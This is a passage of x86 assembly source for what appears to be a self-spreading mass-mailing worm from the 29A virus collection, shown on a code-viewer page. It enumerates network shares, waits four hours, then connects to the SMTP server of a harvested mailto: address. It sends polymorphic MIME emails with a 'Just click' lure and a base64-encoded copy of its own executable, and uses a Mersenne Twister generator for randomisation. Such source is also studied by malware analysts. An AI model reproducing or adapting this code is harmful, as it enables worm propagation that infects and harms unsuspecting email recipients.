📄 29a-7.004
字号:
call find_files
ip_skipnt label near
pop esi
add esi, size share_info_1nt
dec ebx
jne ip_nextnt
ip_freent label near
call dword ptr [esp + 3ch + ipntcrcstk.ipntNetApiBufferFree + 4]
jmp ip_restore
find_ip endp
create_thr3 label near
push esi
push esi
call cCreateThread
;-----------------------------------------------------------------------------
;thread 4: send email to last mailto: address found. slow mailer
;-----------------------------------------------------------------------------
push "23"
push "_2sw"
push esp
call cLoadLibraryA
pop ecx
pop ecx
test eax, eax
jne found_ws2
push "23k"
push "cosw"
push esp
call cLoadLibraryA
pop ecx
pop ecx
found_ws2 label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ws2crcbegin label near ;place < 80h bytes from call for smaller code
dd (ws2crc_count + 1) dup (0)
ws2crcend label near
dd offset wsock_init - offset ws2crcend + 4
wsock_init label near
mov ebx, esp
enter (size WSADATA + 3) and -4, 0
push esp
push 1
call dword ptr [ebx + ws2crcstk.wWSAStartup]
leave
pop eax
pop dword ptr ds:[offset store_send - offset junkhtml_inf + expsize + 401001h]
push PF_NS
push SOCK_STREAM
push AF_INET
call eax
mov dword ptr ds:[offset store_socket - offset junkhtml_inf + expsize + 401001h], eax
xchg ebp, eax
send_email label near
push 240 * 60 * 1000 ;4 hours
call cSleep
mov ebx, esp
push ebp
push 10000h ;message buffer
push GMEM_FIXED
call cGlobalAlloc
push eax ;GlobalFree
xchg edi, eax
mov esi, offset email_block - offset junkhtml_inf + expsize + 401000h
push ebx
push ebp
call decompmain ;smtp1 ("HELO ")
pop ebp
pop ebx
push esi
mov esi, offset mail_recip - offset junkhtml_inf + expsize + 401000h
find_smtp label near
lods byte ptr [esi]
cmp al, '@'
je store_smtp
or al, 5
cmp al, "'"
jne find_smtp
pop eax
branch_skip label near
jmp skip_send
store_smtp label near
mov ecx, edi
mov eax, "ptms"
stos dword ptr [edi]
mov al, '.'
stos byte ptr [edi]
copy_smtp label near
lods byte ptr [esi]
stos byte ptr [edi]
or al, 5
sub al, "'"
jne copy_smtp
pop esi
dec edi
mov byte ptr [edi], al
push ecx
call dword ptr [ebx - 8 + ws2crcstk.wgethostbyname]
xchg ecx, eax
jecxz branch_skip
;-----------------------------------------------------------------------------
;create and initialise sockaddr_in structure
;-----------------------------------------------------------------------------
push 0
push 0
push dword ptr [ecx + hostent.h_addr_list]
push (1900h shl 10h) + AF_INET
mov eax, esp
push size sockaddr_in
push eax
push ebp
call dword ptr [ebx - 8 + ws2crcstk.wconnect]
add esp, size sockaddr_in
call store_crlf
call senddata
;-----------------------------------------------------------------------------
;SMTP client engine by RT Fishel
;polymorphic headers (random comment insertion)
;-----------------------------------------------------------------------------
call decompmain ;smtp2 ("MAIL FROM:<>")
call senddata
call decompmain ;smtp3 ("RCPT TO:")
push esi
mov esi, offset mail_recip - offset junkhtml_inf + expsize + 401000h
copy_recip label near
lods byte ptr [esi]
stos byte ptr [edi]
or al, 5
cmp al, "'"
jne copy_recip
pop esi
dec edi
call store_crlf
call senddata
call decompmain ;smtp4 ("DATA")
call senddata
call decompmain ;header1 ("From: ")
call randword
call decompmain ;header2 ("Subject: ...")
call decompmime ;header31 ("MIME-Version:")
call decomptype ;part11 ("Content-Type:")
call decompcomcr ;part12 ("multipart/mixed;")
call decompcomnt ;part13 (" boundary=")
push edi
call randword ;boundary
call store_crlf
mov eax, edi
pop ecx
push ecx ;boundary pointer
sub eax, ecx
sub eax, 4
push eax ;boundary length
call randlines
pop eax
pop ecx
push ecx
push eax
call bound_copy ;boundary
dec edi
dec edi
mov eax, (0a0dh shl 10h) + '--'
stos dword ptr [edi] ;end of message ;)
stos word ptr [edi]
pop eax
pop ecx
push ecx
push eax
call bound_copy ;--boundary
call decompmain ;body1 ("Just click...")
mov eax, ('--' shl 10h) + 0a0dh
stos dword ptr [edi]
pop eax
pop ecx
push ecx
push eax
call bound_copy
push esi
call decomptype ;content-type
pop esi
call decompcomcr ;part21 ("text/plain;")
call decompcomnt ;part22 (" name=email.htm")
call decompcmap ;part23 ("Content-Transfer-Encoding:")
call decompcomnt ;part24 ("quoted-printable")
call decompcmap ;part25 ("Content-Disposition:")
push offset part26 - offset part25 - 4
pop ebp
call decompcomcr ;part26 ("attachment")
push edi
push esi
call decompmime ;header31 ("MIME-Version:")
pop esi
call decompcmap ;part27 ("Content-Location:")
push esi
patch_encode label near
mov esi, 'RTF!'
call decompcmap ;content-encoding
pop esi
call decompcomcr ;part28 ("base64")
call store_crlf
push esi
push ebp ;CreateFileA
push ebp ;CreateFileA
push OPEN_EXISTING ;CreateFileA
push ebp ;CreateFileA
push FILE_SHARE_READ ;CreateFileA
push GENERIC_READ ;CreateFileA
push edi ;CreateFileA
push 7fh
push edi
push ebp
push (krncrcstk.kGetModuleFileNameA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push (krncrcstk.kCreateFileA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push ebp
push eax
xchg ebx, eax
push (krncrcstk.kGetFileSize - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push eax
xchg ebp, eax
push GMEM_ZEROINIT
call cGlobalAlloc
push eax ;GlobalFree
push ebx ;CloseHandle
push eax
push esp
push ebp
push eax
push ebx
xchg esi, eax
push (krncrcstk.kReadFile - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
call cCloseHandle
call b64encode
call cGlobalFree
pop esi
call decompmain ;part31 ("<script>moveBy...")
pop eax
call decompoct
mov eax, ('--' shl 10h) + 0a0dh
stos dword ptr [edi]
pop eax
pop ecx
call bound_copy
call randlines
call decompmain ;part41
call senddata
call decompmain ;part42
call senddata
skip_send label near
call cGlobalFree
pop ebp
jmp send_email
email_block label near
include email.inc
;-----------------------------------------------------------------------------
;Mersenne Twister RNG MT19937 (c) 1997 Makoto Matsumoto and Takuji Nishimura
;period is ((2^19937)-1) with 623-dimensionally equidistributed sequence
;asm port and size optimise by rgb in 2002
;-----------------------------------------------------------------------------
randinit proc near ;eax = seed, ecx = 0, edi -> RNG cache
pushad
push edi
or eax, 1
mov cx, statelen
init_loop label near
stos dword ptr [edi]
mov edx, 69069
mul edx ;Knuth: x_new = x_old * 69069
loop init_loop
inc ecx ;force reload
call initdelta
initdelta label near
pop edi
add edi, offset randvars - offset initdelta
xchg ecx, eax
stos dword ptr [edi]
pop eax
stos dword ptr [edi]
stos dword ptr [edi]
popad
ret
randinit endp
random proc near
pushad
call randelta
randvars label near
db 'rgb!' ;numbers left
db 'rgb!' ;next pointer
db 'rgb!' ;state pointer
randelta label near
pop esi
push esi
lods dword ptr [esi]
xchg ecx, eax
lods dword ptr [esi]
xchg esi, eax
loop random_ret
mov cx, statelen - period
mov esi, dword ptr [eax]
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -